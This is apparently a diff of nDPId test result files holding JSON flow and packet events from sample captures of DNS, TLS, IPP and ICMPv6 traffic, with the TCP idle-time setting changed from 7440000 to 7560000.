00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454560698,"flow_last_seen":1582454560698,"flow_idle_time":180000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.1","src_port":5351,"dst_port":5350,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598373,"flow_last_seen":1582454599396,"flow_idle_time":180000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -302,12 +302,12 @@
00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598759,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":49880,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}}
00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598758,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53983,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}}
00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454599073,"flow_last_seen":1582454599105,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52031,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}}
00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1582454598416,"flow_last_seen":1582454600719,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5836,"flow_avg_l4_payload_len":291,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50578,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1582454598418,"flow_last_seen":1582454600719,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5858,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50579,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1582454598377,"flow_last_seen":1582454598754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9046,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.25.53","src_port":50576,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1582454600508,"flow_last_seen":1582454600678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9599,"flow_avg_l4_payload_len":342,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.24.53","src_port":50588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"}}
00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1582454598416,"flow_last_seen":1582454600719,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5836,"flow_avg_l4_payload_len":291,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50578,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1582454598418,"flow_last_seen":1582454600719,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5858,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50579,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1582454598377,"flow_last_seen":1582454598754,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9046,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.25.53","src_port":50576,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1582454600508,"flow_last_seen":1582454600678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9599,"flow_avg_l4_payload_len":342,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.24.53","src_port":50588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"}}
00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598760,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62526,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}}
00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1582454598387,"flow_last_seen":1582454598716,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":696,"flow_tot_l4_payload_len":827,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":49152,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Apple","breed":"Safe","category":"ConnCheck"}}
00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1582454598387,"flow_last_seen":1582454598716,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":696,"flow_tot_l4_payload_len":827,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":49152,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Apple","breed":"Safe","category":"ConnCheck"}}
00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454596364,"flow_last_seen":1582454597360,"flow_idle_time":120000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454595354,"flow_last_seen":1582454599568,"flow_idle_time":120000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598755,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52682,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"}}

36
test/results/ipp.pcap.out
View File

@@ -1,23 +1,23 @@
00454{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"ipp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00540{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ipp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1210953938216}
00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1210953938217,"flow_last_seen":1210953938217,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1210953938217,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55341,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1210953938217,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1210953938217,"pkt":"ABJ5gGlgABtjmL82CABFAAA84QBAAEAGMHwKCgoxCgoK+9gtAnfcBg8oAAAAAKACFtBTiQAAAgQFtAQCCAoAa+4oAAAAAAEDAwc="}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1210953938217,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1210953938217,"pkt":"ABtjmL82ABJ5gGlgCABFAAA8U54AAEAG\/d4KCgr7CgoKMQJ32C21dp4B3AYPKaASFtAViwAAAgQFtAEDAwABAQgKAFjtJABr7ig="}
00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1210953938217,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1210953938217,"pkt":"ABJ5gGlgABtjmL82CABFAAA04QFAAEAGMIMKCgoxCgoK+9gtAnfcBg8ptXaeAoAQAC5X7gAAAQEICgBr7isAWO0k"}
00759{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1210953938217,"flow_last_seen":1210953938217,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1210953938217,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55341,"dst_port":631,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"IPP.HTTP","breed":"Acceptable","category":"Web"}}
00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1210953938235,"flow_last_seen":1210953938235,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1210953938235,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55342,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1210953938235,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1210953938235,"pkt":"ABJ5gGlgABtjmL82CABFAAA8xghAAEAGS3QKCgoxCgoK+9guAnfcdyg0AAAAAKACFtA59wAAAgQFtAQCCAoAa+48AAAAAAEDAwc="}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1210953938235,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1210953938235,"pkt":"ABtjmL82ABJ5gGlgCABFAAA8U6wAAEAG\/dAKCgr7CgoKMQJ32C61d5gB3HcoNaASFtAB+AAAAgQFtAEDAwABAQgKAFjtJABr7jw="}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1210953938235,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1210953938235,"pkt":"ABJ5gGlgABtjmL82CABFAAA0xglAAEAGS3sKCgoxCgoK+9guAnfcdyg1tXeYAoAQAC5EXQAAAQEICgBr7j0AWO0k"}
00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1210953938235,"flow_last_seen":1210953938236,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1210953938236,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55342,"dst_port":631,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"IPP.HTTP","breed":"Acceptable","category":"Web"}}
00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1210953939430,"flow_last_seen":1210953939430,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1210953939430,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55343,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1210953939430,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1210953939430,"pkt":"ABJ5gGlgABtjmL82CABFAAA8ASxAAEAGEFEKCgoxCgoK+9gvAnfdKfPLAAAAAKACFtBpAQAAAgQFtAQCCAoAa\/LnAAAAAAEDAwc="}
00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1210953939431,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1210953939431,"pkt":"ABtjmL82ABJ5gGlgCABFAAA8VFQAAEAG\/SgKCgr7CgoKMQJ32C+1fm4B3SnzzKASFtBa+AAAAgQFtAEDAwABAQgKAFjtJwBr8uc="}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1210953939431,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1210953939431,"pkt":"ABJ5gGlgABtjmL82CABFAAA0AS1AAEAGEFgKCgoxCgoK+9gvAnfdKfPMtX5uAoAQAC6dXQAAAQEICgBr8ugAWO0n"}
00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":256,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1210953939430,"flow_last_seen":1210953939431,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1210953939431,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55343,"dst_port":631,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"IPP.HTTP","breed":"Acceptable","category":"Web"}}
00800{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":279,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1210953938217,"flow_last_seen":1210953938237,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":327,"flow_tot_l4_payload_len":931,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1210953939492,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55341,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"IPP.HTTP","breed":"Acceptable","category":"Web"}}
00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":279,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":234,"flow_first_seen":1210953938235,"flow_last_seen":1210953939433,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2896,"flow_tot_l4_payload_len":227991,"flow_avg_l4_payload_len":974,"midstream":0,"thread_ts_msec":1210953939492,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55342,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"IPP.HTTP","breed":"Acceptable","category":"Web"}}
00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":279,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1210953939430,"flow_last_seen":1210953939492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":1302,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1210953939492,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55343,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"IPP.HTTP","breed":"Acceptable","category":"Web"}}
00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1210953938217,"flow_last_seen":1210953938217,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1210953938217,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55341,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1210953938217,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1210953938217,"pkt":"ABJ5gGlgABtjmL82CABFAAA84QBAAEAGMHwKCgoxCgoK+9gtAnfcBg8oAAAAAKACFtBTiQAAAgQFtAQCCAoAa+4oAAAAAAEDAwc="}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1210953938217,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1210953938217,"pkt":"ABtjmL82ABJ5gGlgCABFAAA8U54AAEAG\/d4KCgr7CgoKMQJ32C21dp4B3AYPKaASFtAViwAAAgQFtAEDAwABAQgKAFjtJABr7ig="}
00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1210953938217,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1210953938217,"pkt":"ABJ5gGlgABtjmL82CABFAAA04QFAAEAGMIMKCgoxCgoK+9gtAnfcBg8ptXaeAoAQAC5X7gAAAQEICgBr7isAWO0k"}
